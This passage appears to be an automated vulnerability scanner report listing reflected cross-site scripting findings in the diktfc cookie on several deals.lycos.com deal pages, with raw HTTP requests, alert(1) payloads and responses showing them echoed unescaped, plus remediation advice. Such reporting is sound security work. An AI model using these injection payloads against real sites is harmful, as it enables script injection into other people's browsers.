This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae7b9b"%3balert(1)//d6f0902539e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae7b9b";alert(1)//d6f0902539e"
});
</script>
...[SNIP]...

3.171. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a58"><script>alert(1)</script>e26ae126c13 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13&amp;cj=1" alt="tracker" />
...[SNIP]...

3.172. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a834a"%3balert(1)//5a3d78b4e4f was submitted in the diktfc cookie. This input was echoed as a834a";alert(1)//5a3d78b4e4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa834a"%3balert(1)//5a3d78b4e4f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
vascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa834a";alert(1)//5a3d78b4e4f"
});
</script>
...[SNIP]...

3.173. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b8b4"%3balert(1)//6666cd16315 was submitted in the diktfc cookie. This input was echoed as 3b8b4";alert(1)//6666cd16315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b8b4"%3balert(1)//6666cd16315; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:41 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
>
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b8b4";alert(1)//6666cd16315"
});
</script>
...[SNIP]...

3.174. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dfde"><script>alert(1)</script>8551183e611 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611&amp;cj=1" alt="tracker" />
...[SNIP]...

3.175. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/digital-blue-carabiner-digital-camera-for-3-413838

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d57"%3balert(1)//40027816f73 was submitted in the diktfc cookie. This input was echoed as 15d57";alert(1)//40027816f73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A15d57"%3balert(1)//40027816f73; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:18 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
>
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A15d57";alert(1)//40027816f73"
});
</script>
...[SNIP]...

3.176. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/digital-blue-carabiner-digital-camera-for-3-413838

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e75"><script>alert(1)</script>1d919f1ca71 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71&amp;cj=1" alt="tracker" />
...[SNIP]...

3.177. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/drawn-the-painted-tower-for-ipad-for-5-414364

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff58e"%3balert(1)//2eff680c602 was submitted in the diktfc cookie. This input was echoed as ff58e";alert(1)//2eff680c602 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aff58e"%3balert(1)//2eff680c602; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aff58e";alert(1)//2eff680c602"
});
</script>
...[SNIP]...

3.178. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/drawn-the-painted-tower-for-ipad-for-5-414364

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6006c"><script>alert(1)</script>104c0231a35 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35&amp;cj=1" alt="tracker" />
...[SNIP]...

3.179. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/element-40-1080p-lcd-hdtv-350-414616

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2e8f"%3balert(1)//4a914e95c2b was submitted in the diktfc cookie. This input was echoed as c2e8f";alert(1)//4a914e95c2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac2e8f"%3balert(1)//4a914e95c2b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
xt/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac2e8f";alert(1)//4a914e95c2b"
});
</script>
...[SNIP]...

3.180. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/element-40-1080p-lcd-hdtv-350-414616

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe5d1"><script>alert(1)</script>c619991de16 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
